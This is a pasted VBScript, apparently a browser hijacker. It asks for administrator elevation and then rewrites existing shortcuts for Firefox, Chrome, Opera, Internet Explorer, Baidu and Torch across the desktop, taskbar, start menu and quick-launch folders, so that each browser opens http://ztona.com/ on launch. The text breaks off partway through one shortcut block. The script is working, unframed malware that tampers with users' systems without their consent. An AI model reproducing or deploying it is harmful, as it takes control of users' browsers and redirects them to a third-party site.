Advertisement
Guest User

Untitled

a guest
Sep 30th, 2016
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.29 KB | None | 0 0
  1.  
  2. If WScript.Arguments.Named.Exists("elevated") = False Then
  3. CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ /elevated", "", "runas", 1
  4. WScript.Quit
  5. End If
  6.  
  7. set wshell = Createobject("wscript.shell")
  8. set Fso= createobject("scripting.filesystemobject")
  9. Set objShell = CreateObject("WScript.Shell")
  10. userProfilePath = objShell.ExpandEnvironmentStrings("%UserProfile%")
  11. WScript.Sleep 1000
  12.  
  13. 'Firefox
  14. shortcutpath = userProfilePath & "\Desktop\Mozilla Firefox.lnk"
  15. ExePath = "C:\Program Files\Mozilla Firefox\firefox.exe"
  16. ShortCutArg ="http://ztona.com/"
  17. If Fso.FileExists(ShortcutPath) then
  18. Set shortcut = wshell.CreateShortcut(shortcutpath)
  19. shortcut.TargetPath = ExePath
  20. shortcut.Arguments = ShortCutArg
  21. shortcut.Save
  22. end if
  23.  
  24. shortcutpath1 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk"
  25. ExePath1 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  26. ShortCutArg1 ="http://ztona.com/"
  27. If Fso.FileExists(ShortcutPath1) then
  28. Set shortcut = wshell.CreateShortcut(shortcutpath1)
  29. shortcut.TargetPath = ExePath1
  30. shortcut.Arguments = ShortCutArg1
  31. shortcut.Save
  32. end if
  33.  
  34. shortcutpath2 = "C:\Users\Public\Desktop\Mozilla Firefox.lnk"
  35. ExePath2 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  36. ShortCutArg2 ="http://ztona.com/"
  37. If Fso.FileExists(ShortcutPath2) then
  38. Set shortcut = wshell.CreateShortcut(shortcutpath2)
  39. shortcut.TargetPath = ExePath2
  40. shortcut.Arguments = ShortCutArg2
  41. shortcut.Save
  42. end if
  43.  
  44. shortcutpath3 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk"
  45. ExePath3 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  46. ShortCutArg3 ="http://ztona.com/"
  47. If Fso.FileExists(ShortcutPath3) then
  48. Set shortcut = wshell.CreateShortcut(shortcutpath3)
  49. shortcut.TargetPath = ExePath3
  50. shortcut.Arguments = ShortCutArg3
  51. shortcut.Save
  52. end if
  53.  
  54. shortcutpath4 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk"
  55. ExePath4 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  56. ShortCutArg4 ="http://ztona.com/"
  57. If Fso.FileExists(ShortcutPath4) then
  58. Set shortcut = wshell.CreateShortcut(shortcutpath4)
  59. shortcut.TargetPath = ExePath4
  60. shortcut.Arguments = ShortCutArg4
  61. shortcut.Save
  62. end if
  63.  
  64. shortcutpath5 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk"
  65. ExePath5 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  66. ShortCutArg5 ="http://ztona.com/"
  67. If Fso.FileExists(ShortcutPath5) then
  68. Set shortcut = wshell.CreateShortcut(shortcutpath5)
  69. shortcut.TargetPath = ExePath5
  70. shortcut.Arguments = ShortCutArg5
  71. shortcut.Save
  72. end if
  73.  
  74. shortcutpath6 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Mozilla Firefox.lnk"
  75. ExePath6 = "C:\Program Files\Mozilla Firefox\firefox.exe"
  76. ShortCutArg6 ="http://ztona.com/"
  77. If Fso.FileExists(ShortcutPath6) then
  78. Set shortcut = wshell.CreateShortcut(shortcutpath6)
  79. shortcut.TargetPath = ExePath6
  80. shortcut.Arguments = ShortCutArg6
  81. shortcut.Save
  82. end if
  83.  
  84. shortcutpath7 = userProfilePath & "\Desktop\Mozilla Firefox.lnk"
  85. ExePath7 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  86. ShortCutArg7 ="http://ztona.com/"
  87. If Fso.FileExists(ShortcutPath7) then
  88. Set shortcut = wshell.CreateShortcut(shortcutpath7)
  89. shortcut.TargetPath = ExePath7
  90. shortcut.Arguments = ShortCutArg7
  91. shortcut.Save
  92. end if
  93.  
  94. shortcutpath8 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk"
  95. ExePath8 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  96. ShortCutArg8 ="http://ztona.com/"
  97. If Fso.FileExists(ShortcutPath8) then
  98. Set shortcut = wshell.CreateShortcut(shortcutpath8)
  99. shortcut.TargetPath = ExePath8
  100. shortcut.Arguments = ShortCutArg8
  101. shortcut.Save
  102. end if
  103.  
  104. shortcutpath9 = "C:\Users\Public\Desktop\Mozilla Firefox.lnk"
  105. ExePath9 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  106. ShortCutArg9 ="http://ztona.com/"
  107. If Fso.FileExists(ShortcutPath9) then
  108. Set shortcut = wshell.CreateShortcut(shortcutpath9)
  109. shortcut.TargetPath = ExePath9
  110. shortcut.Arguments = ShortCutArg9
  111. shortcut.Save
  112. end if
  113.  
  114. shortcutpath10 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk"
  115. ExePath10 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  116. ShortCutArg10 ="http://ztona.com/"
  117. If Fso.FileExists(ShortcutPath10) then
  118. Set shortcut = wshell.CreateShortcut(shortcutpath10)
  119. shortcut.TargetPath = ExePath10
  120. shortcut.Arguments = ShortCutArg10
  121. shortcut.Save
  122. end if
  123.  
  124. shortcutpath11 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk"
  125. ExePath11 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  126. ShortCutArg11 ="http://ztona.com/"
  127. If Fso.FileExists(ShortcutPath11) then
  128. Set shortcut = wshell.CreateShortcut(shortcutpath11)
  129. shortcut.TargetPath = ExePath11
  130. shortcut.Arguments = ShortCutArg11
  131. shortcut.Save
  132. end if
  133.  
  134. shortcutpath12 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk"
  135. ExePath12 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  136. ShortCutArg12 ="http://ztona.com/"
  137. If Fso.FileExists(ShortcutPath12) then
  138. Set shortcut = wshell.CreateShortcut(shortcutpath12)
  139. shortcut.TargetPath = ExePath12
  140. shortcut.Arguments = ShortCutArg12
  141. shortcut.Save
  142. end if
  143.  
  144. shortcutpath13 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Mozilla Firefox.lnk"
  145. ExePath13 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"
  146. ShortCutArg13 ="http://ztona.com/"
  147. If Fso.FileExists(ShortcutPath13) then
  148. Set shortcut = wshell.CreateShortcut(shortcutpath13)
  149. shortcut.TargetPath = ExePath13
  150. shortcut.Arguments = ShortCutArg13
  151. shortcut.Save
  152. end if
  153.  
  154.  
  155.  
  156. 'Chrome
  157. shortcutpath14 = userProfilePath & "\Desktop\Google Chrome.lnk"
  158. ExePath14 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  159. ShortCutArg14 ="http://ztona.com/"
  160. If Fso.FileExists(ShortcutPath14) then
  161. Set shortcut = wshell.CreateShortcut(shortcutpath14)
  162. shortcut.TargetPath = ExePath14
  163. shortcut.Arguments = ShortCutArg14
  164. shortcut.Save
  165. end if
  166.  
  167. shortcutpath15 = "C:\Users\Public\Desktop\Google Chrome.lnk"
  168. ExePath15 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  169. ShortCutArg15 ="http://ztona.com/"
  170. If Fso.FileExists(ShortcutPath15) then
  171. Set shortcut = wshell.CreateShortcut(shortcutpath15)
  172. shortcut.TargetPath = ExePath15
  173. shortcut.Arguments = ShortCutArg15
  174. shortcut.Save
  175. end if
  176.  
  177. shortcutpath16 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
  178. ExePath16 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  179. ShortCutArg16 ="http://ztona.com/"
  180. If Fso.FileExists(ShortcutPath16) then
  181. Set shortcut = wshell.CreateShortcut(shortcutpath16)
  182. shortcut.TargetPath = ExePath16
  183. shortcut.Arguments = ShortCutArg16
  184. shortcut.Save
  185. end if
  186.  
  187. shortcutpath17 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk"
  188. ExePath17 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  189. ShortCutArg17 ="http://ztona.com/"
  190. If Fso.FileExists(ShortcutPath17) then
  191. Set shortcut = wshell.CreateShortcut(shortcutpath17)
  192. shortcut.TargetPath = ExePath17
  193. shortcut.Arguments = ShortCutArg17
  194. shortcut.Save
  195. end if
  196.  
  197. shortcutpath18 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
  198. ExePath18 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  199. ShortCutArg18 ="http://ztona.com/"
  200. If Fso.FileExists(ShortcutPath18) then
  201. Set shortcut = wshell.CreateShortcut(shortcutpath18)
  202. shortcut.TargetPath = ExePath18
  203. shortcut.Arguments = ShortCutArg18
  204. shortcut.Save
  205. end if
  206.  
  207. shortcutpath19 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk"
  208. ExePath19 = "C:\Program Files\Google\Chrome\Application\chrome.exe"
  209. ShortCutArg19 ="http://ztona.com/"
  210. If Fso.FileExists(ShortcutPath19) then
  211. Set shortcut = wshell.CreateShortcut(shortcutpath19)
  212. shortcut.TargetPath = ExePath19
  213. shortcut.Arguments = ShortCutArg19
  214. shortcut.Save
  215. end if
  216.  
  217. shortcutpath20 = userProfilePath & "\Desktop\Google Chrome.lnk"
  218. ExePath20 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  219. ShortCutArg20 ="http://ztona.com/"
  220. If Fso.FileExists(ShortcutPath20) then
  221. Set shortcut = wshell.CreateShortcut(shortcutpath20)
  222. shortcut.TargetPath = ExePath20
  223. shortcut.Arguments = ShortCutArg20
  224. shortcut.Save
  225. end if
  226.  
  227. shortcutpath21 = "C:\Users\Public\Desktop\Google Chrome.lnk"
  228. ExePath21 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  229. ShortCutArg21 ="http://ztona.com/"
  230. If Fso.FileExists(ShortcutPath21) then
  231. Set shortcut = wshell.CreateShortcut(shortcutpath21)
  232. shortcut.TargetPath = ExePath21
  233. shortcut.Arguments = ShortCutArg21
  234. shortcut.Save
  235. end if
  236.  
  237. shortcutpath22 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk"
  238. ExePath22 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  239. ShortCutArg22 ="http://ztona.com/"
  240. If Fso.FileExists(ShortcutPath22) then
  241. Set shortcut = wshell.CreateShortcut(shortcutpath22)
  242. shortcut.TargetPath = ExePath22
  243. shortcut.Arguments = ShortCutArg22
  244. shortcut.Save
  245. end if
  246.  
  247. shortcutpath23 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk"
  248. ExePath23 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  249. ShortCutArg23 ="http://ztona.com/"
  250. If Fso.FileExists(ShortcutPath23) then
  251. Set shortcut = wshell.CreateShortcut(shortcutpath23)
  252. shortcut.TargetPath = ExePath23
  253. shortcut.Arguments = ShortCutArg23
  254. shortcut.Save
  255. end if
  256.  
  257. shortcutpath24 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"
  258. ExePath24 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  259. ShortCutArg24 ="http://ztona.com/"
  260. If Fso.FileExists(ShortcutPath24) then
  261. Set shortcut = wshell.CreateShortcut(shortcutpath24)
  262. shortcut.TargetPath = ExePath24
  263. shortcut.Arguments = ShortCutArg24
  264. shortcut.Save
  265. end if
  266.  
  267. shortcutpath25 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk"
  268. ExePath25 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  269. ShortCutArg25 ="http://ztona.com/"
  270. If Fso.FileExists(ShortcutPath25) then
  271. Set shortcut = wshell.CreateShortcut(shortcutpath25)
  272. shortcut.TargetPath = ExePath25
  273. shortcut.Arguments = ShortCutArg25
  274. shortcut.Save
  275. end if
  276.  
  277. shortcutpath44 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk"
  278. ExePath44 = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
  279. ShortCutArg44 ="http://ztona.com/"
  280. If Fso.FileExists(ShortcutPath44) then
  281. Set shortcut = wshell.CreateShortcut(shortcutpath44)
  282. shortcut.TargetPath = ExePath44
  283. shortcut.Arguments = ShortCutArg44
  284. shortcut.Save
  285. end if
  286.  
  287.  
  288. 'Opera
  289. shortcutpath26 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk"
  290. ExePath26 = "C:\Program Files\Opera\launcher.exe"
  291. ShortCutArg26 ="http://ztona.com/"
  292. If Fso.FileExists(ShortcutPath26) then
  293. Set shortcut = wshell.CreateShortcut(shortcutpath26)
  294. shortcut.TargetPath = ExePath26
  295. shortcut.Arguments = ShortCutArg26
  296. shortcut.Save
  297. end if
  298.  
  299. shortcutpath27 = "C:\Users\Public\Desktop\Opera.lnk"
  300. ExePath27 = "C:\Program Files\Opera\launcher.exe"
  301. ShortCutArg27 ="http://ztona.com/"
  302. If Fso.FileExists(ShortcutPath27) then
  303. Set shortcut = wshell.CreateShortcut(shortcutpath27)
  304. shortcut.TargetPath = ExePath27
  305. shortcut.Arguments = ShortCutArg27
  306. shortcut.Save
  307. end if
  308.  
  309. shortcutpath28 = userProfilePath & "\Desktop\Opera.lnk"
  310. ExePath28 = "C:\Program Files\Opera\launcher.exe"
  311. ShortCutArg28 ="http://ztona.com/"
  312. If Fso.FileExists(ShortcutPath28) then
  313. Set shortcut = wshell.CreateShortcut(shortcutpath28)
  314. shortcut.TargetPath = ExePath28
  315. shortcut.Arguments = ShortCutArg28
  316. shortcut.Save
  317. end if
  318.  
  319. shortcutpath29 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk"
  320. ExePath29 = "C:\Program Files\Opera\launcher.exe"
  321. ShortCutArg29 ="http://ztona.com/"
  322. If Fso.FileExists(ShortcutPath29) then
  323. Set shortcut = wshell.CreateShortcut(shortcutpath29)
  324. shortcut.TargetPath = ExePath29
  325. shortcut.Arguments = ShortCutArg29
  326. shortcut.Save
  327. end if
  328.  
  329. shortcutpath30 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Opera.lnk"
  330. ExePath30 = "C:\Program Files\Opera\launcher.exe"
  331. ShortCutArg30 ="http://ztona.com/"
  332. If Fso.FileExists(ShortcutPath30) then
  333. Set shortcut = wshell.CreateShortcut(shortcutpath30)
  334. shortcut.TargetPath = ExePath30
  335. shortcut.Arguments = ShortCutArg30
  336. shortcut.Save
  337. end if
  338.  
  339. shortcutpath31 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Opera.lnk"
  340. ExePath31 = "C:\Program Files\Opera\launcher.exe"
  341. ShortCutArg31 ="http://ztona.com/"
  342. If Fso.FileExists(ShortcutPath31) then
  343. Set shortcut = wshell.CreateShortcut(shortcutpath31)
  344. shortcut.TargetPath = ExePath31
  345. shortcut.Arguments = ShortCutArg31
  346. shortcut.Save
  347. end if
  348.  
  349. shortcutpath32 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk"
  350. ExePath32 = "C:\Program Files (x86)\Opera\launcher.exe"
  351. ShortCutArg32 ="http://ztona.com/"
  352. If Fso.FileExists(ShortcutPath32) then
  353. Set shortcut = wshell.CreateShortcut(shortcutpath32)
  354. shortcut.TargetPath = ExePath32
  355. shortcut.Arguments = ShortCutArg32
  356. shortcut.Save
  357. end if
  358.  
  359. shortcutpath33 = "C:\Users\Public\Desktop\Opera.lnk"
  360. ExePath33 = "C:\Program Files (x86)\Opera\launcher.exe"
  361. ShortCutArg33 ="http://ztona.com/"
  362. If Fso.FileExists(ShortcutPath33) then
  363. Set shortcut = wshell.CreateShortcut(shortcutpath33)
  364. shortcut.TargetPath = ExePath33
  365. shortcut.Arguments = ShortCutArg33
  366. shortcut.Save
  367. end if
  368.  
  369. shortcutpath34 = userProfilePath & "\Desktop\Opera.lnk"
  370. ExePath34 = "C:\Program Files (x86)\Opera\launcher.exe"
  371. ShortCutArg34 ="http://ztona.com/"
  372. If Fso.FileExists(ShortcutPath34) then
  373. Set shortcut = wshell.CreateShortcut(shortcutpath34)
  374. shortcut.TargetPath = ExePath34
  375. shortcut.Arguments = ShortCutArg34
  376. shortcut.Save
  377. end if
  378.  
  379. shortcutpath35 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk"
  380. ExePath35 = "C:\Program Files (x86)\Opera\launcher.exe"
  381. ShortCutArg35 ="http://ztona.com/"
  382. If Fso.FileExists(ShortcutPath35) then
  383. Set shortcut = wshell.CreateShortcut(shortcutpath35)
  384. shortcut.TargetPath = ExePath35
  385. shortcut.Arguments = ShortCutArg35
  386. shortcut.Save
  387. end if
  388.  
  389. shortcutpath36 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Opera.lnk"
  390. ExePath36 = "C:\Program Files (x86)\Opera\launcher.exe"
  391. ShortCutArg36 ="http://ztona.com/"
  392. If Fso.FileExists(ShortcutPath36) then
  393. Set shortcut = wshell.CreateShortcut(shortcutpath36)
  394. shortcut.TargetPath = ExePath36
  395. shortcut.Arguments = ShortCutArg36
  396. shortcut.Save
  397. end if
  398.  
  399. shortcutpath37 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Opera.lnk"
  400. ExePath37 = "C:\Program Files (x86)\Opera\launcher.exe"
  401. ShortCutArg37 ="http://ztona.com/"
  402. If Fso.FileExists(ShortcutPath37) then
  403. Set shortcut = wshell.CreateShortcut(shortcutpath37)
  404. shortcut.TargetPath = ExePath37
  405. shortcut.Arguments = ShortCutArg37
  406. shortcut.Save
  407. end if
  408.  
  409.  
  410. 'IExploler
  411. shortcutpath38 = userProfilePath & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk"
  412. ExePath38 = "C:\Program Files\Internet Explorer\iexplore.exe"
  413. ShortCutArg38 ="http://ztona.com/"
  414. If Fso.FileExists(ShortcutPath38) then
  415. Set shortcut = wshell.CreateShortcut(shortcutpath38)
  416. shortcut.TargetPath = ExePath38
  417. shortcut.Arguments = ShortCutArg38
  418. shortcut.Save
  419. end if
  420.  
  421. shortcutpath39 = userProfilePath & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk"
  422. ExePath39 = "C:\Program Files\Internet Explorer\iexplore.exe"
  423. ShortCutArg39 ="http://ztona.com/"
  424. If Fso.FileExists(ShortcutPath39) then
  425. Set shortcut = wshell.CreateShortcut(shortcutpath39)
  426. shortcut.TargetPath = ExePath39
  427. shortcut.Arguments = ShortCutArg39
  428. shortcut.Save
  429. end if
  430.  
  431. shortcutpath40 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk"
  432. ExePath40 = "C:\Program Files\Internet Explorer\iexplore.exe"
  433. ShortCutArg40 ="http://ztona.com/"
  434. If Fso.FileExists(ShortcutPath40) then
  435. Set shortcut = wshell.CreateShortcut(shortcutpath40)
  436. shortcut.TargetPath = ExePath40
  437. shortcut.Arguments = ShortCutArg40
  438. shortcut.Save
  439. end if
  440.  
  441. shortcutpath41 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Launch Internet Explorer Browser.lnk"
  442. ExePath41 = "C:\Program Files\Internet Explorer\iexplore.exe"
  443. ShortCutArg41 ="http://ztona.com/"
  444. If Fso.FileExists(ShortcutPath41) then
  445. Set shortcut = wshell.CreateShortcut(shortcutpath41)
  446. shortcut.TargetPath = ExePath41
  447. shortcut.Arguments = ShortCutArg41
  448. shortcut.Save
  449. end if
  450.  
  451. shortcutpath42 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Launch Internet Explorer Browser.lnk"
  452. ExePath42 = "C:\Program Files\Internet Explorer\iexplore.exe"
  453. ShortCutArg42 ="http://ztona.com/"
  454. If Fso.FileExists(ShortcutPath42) then
  455. Set shortcut = wshell.CreateShortcut(shortcutpath42)
  456. shortcut.TargetPath = ExePath42
  457. shortcut.Arguments = ShortCutArg42
  458. shortcut.Save
  459. end if
  460.  
  461. shortcutpath43 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk"
  462. ExePath43 = "C:\Program Files\Internet Explorer\iexplore.exe"
  463. ShortCutArg43 ="http://ztona.com/"
  464. If Fso.FileExists(ShortcutPath43) then
  465. Set shortcut = wshell.CreateShortcut(shortcutpath43)
  466. shortcut.TargetPath = ExePath43
  467. shortcut.Arguments = ShortCutArg43
  468. shortcut.Save
  469. end if
  470.  
  471. shortcutpath57 = "C:\Users\Public\Desktop\Internet Explorer.lnk"
  472. ExePath57 = "C:\Program Files\Internet Explorer\iexplore.exe"
  473. ShortCutArg57 ="http://ztona.com/"
  474. If Fso.FileExists(ShortcutPath57) then
  475. Set shortcut = wshell.CreateShortcut(shortcutpath57)
  476. shortcut.TargetPath = ExePath57
  477. shortcut.Arguments = ShortCutArg57
  478. shortcut.Save
  479. end if
  480.  
  481. 'Baidu browser
  482. shortcutpath45 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Baidu Browser.lnk"
  483. ExePath45 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  484. ShortCutArg45 ="http://ztona.com/"
  485. If Fso.FileExists(ShortcutPath45) then
  486. Set shortcut = wshell.CreateShortcut(shortcutpath45)
  487. shortcut.TargetPath = ExePath45
  488. shortcut.Arguments = ShortCutArg45
  489. shortcut.Save
  490. end if
  491.  
  492. shortcutpath46 = userProfilePath & "\Desktop\Baidu Browser.lnk"
  493. ExePath46 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  494. ShortCutArg46 ="http://ztona.com/"
  495. If Fso.FileExists(ShortcutPath46) then
  496. Set shortcut = wshell.CreateShortcut(shortcutpath46)
  497. shortcut.TargetPath = ExePath46
  498. shortcut.Arguments = ShortCutArg46
  499. shortcut.Save
  500. end if
  501.  
  502. shortcutpath47 = "C:\Users\Public\Desktop\Baidu Browser.lnk"
  503. ExePath47 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  504. ShortCutArg47 ="http://ztona.com/"
  505. If Fso.FileExists(ShortcutPath47) then
  506. Set shortcut = wshell.CreateShortcut(shortcutpath47)
  507. shortcut.TargetPath = ExePath47
  508. shortcut.Arguments = ShortCutArg47
  509. shortcut.Save
  510. end if
  511.  
  512. shortcutpath48 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Baidu Browser.lnk"
  513. ExePath48 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  514. ShortCutArg48 ="http://ztona.com/"
  515. If Fso.FileExists(ShortcutPath48) then
  516. Set shortcut = wshell.CreateShortcut(shortcutpath48)
  517. shortcut.TargetPath = ExePath48
  518. shortcut.Arguments = ShortCutArg48
  519. shortcut.Save
  520. end if
  521.  
  522. shortcutpath49 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Baidu Browser.lnk"
  523. ExePath49 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  524. ShortCutArg49 ="http://ztona.com/"
  525. If Fso.FileExists(ShortcutPath49) then
  526. Set shortcut = wshell.CreateShortcut(shortcutpath49)
  527. shortcut.TargetPath = ExePath49
  528. shortcut.Arguments = ShortCutArg49
  529. shortcut.Save
  530. end if
  531.  
  532. shortcutpath50 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Baidu Browser.lnk"
  533. ExePath50 = "C:\Program Files\baidu\Baidu Browser\spark.exe"
  534. ShortCutArg50 ="http://ztona.com/"
  535. If Fso.FileExists(ShortcutPath50) then
  536. Set shortcut = wshell.CreateShortcut(shortcutpath50)
  537. shortcut.TargetPath = ExePath50
  538. shortcut.Arguments = ShortCutArg50
  539. shortcut.Save
  540. end if
  541.  
  542. shortcutpath51 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Baidu Browser.lnk"
  543. ExePath51 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  544. ShortCutArg51 ="http://ztona.com/"
  545. If Fso.FileExists(ShortcutPath51) then
  546. Set shortcut = wshell.CreateShortcut(shortcutpath51)
  547. shortcut.TargetPath = ExePath51
  548. shortcut.Arguments = ShortCutArg51
  549. shortcut.Save
  550. end if
  551.  
  552. shortcutpath52 = userProfilePath & "\Desktop\Baidu Browser.lnk"
  553. ExePath52 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  554. ShortCutArg52 ="http://ztona.com/"
  555. If Fso.FileExists(ShortcutPath52) then
  556. Set shortcut = wshell.CreateShortcut(shortcutpath52)
  557. shortcut.TargetPath = ExePath52
  558. shortcut.Arguments = ShortCutArg52
  559. shortcut.Save
  560. end if
  561.  
  562. shortcutpath53 = "C:\Users\Public\Desktop\Baidu Browser.lnk"
  563. ExePath53 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  564. ShortCutArg53 ="http://ztona.com/"
  565. If Fso.FileExists(ShortcutPath53) then
  566. Set shortcut = wshell.CreateShortcut(shortcutpath53)
  567. shortcut.TargetPath = ExePath53
  568. shortcut.Arguments = ShortCutArg53
  569. shortcut.Save
  570. end if
  571.  
  572. shortcutpath54 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Baidu Browser.lnk"
  573. ExePath54 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  574. ShortCutArg54 ="http://ztona.com/"
  575. If Fso.FileExists(ShortcutPath54) then
  576. Set shortcut = wshell.CreateShortcut(shortcutpath54)
  577. shortcut.TargetPath = ExePath54
  578. shortcut.Arguments = ShortCutArg54
  579. shortcut.Save
  580. end if
  581.  
  582. shortcutpath55 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Baidu Browser.lnk"
  583. ExePath55 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  584. ShortCutArg55 ="http://ztona.com/"
  585. If Fso.FileExists(ShortcutPath55) then
  586. Set shortcut = wshell.CreateShortcut(shortcutpath55)
  587. shortcut.TargetPath = ExePath55
  588. shortcut.Arguments = ShortCutArg55
  589. shortcut.Save
  590. end if
  591.  
  592. shortcutpath56 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Baidu Browser.lnk"
  593. ExePath56 = "C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe"
  594. ShortCutArg56 ="http://ztona.com/"
  595. If Fso.FileExists(ShortcutPath56) then
  596. Set shortcut = wshell.CreateShortcut(shortcutpath56)
  597. shortcut.TargetPath = ExePath56
  598. shortcut.Arguments = ShortCutArg56
  599. shortcut.Save
  600. end if
  601.  
  602. 'Torch browser
  603. shortcutpath58 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Torch.lnk"
  604. ExePath58 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  605. ShortCutArg58 ="http://ztona.com/"
  606. If Fso.FileExists(ShortcutPath58) then
  607. Set shortcut = wshell.CreateShortcut(shortcutpath58)
  608. shortcut.TargetPath = ExePath58
  609. shortcut.Arguments = ShortCutArg58
  610. shortcut.Save
  611. end if
  612.  
  613. shortcutpath59 = userProfilePath & "\Desktop\Torch.lnk"
  614. ExePath59 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  615. ShortCutArg59 ="http://ztona.com/"
  616. If Fso.FileExists(ShortcutPath59) then
  617. Set shortcut = wshell.CreateShortcut(shortcutpath59)
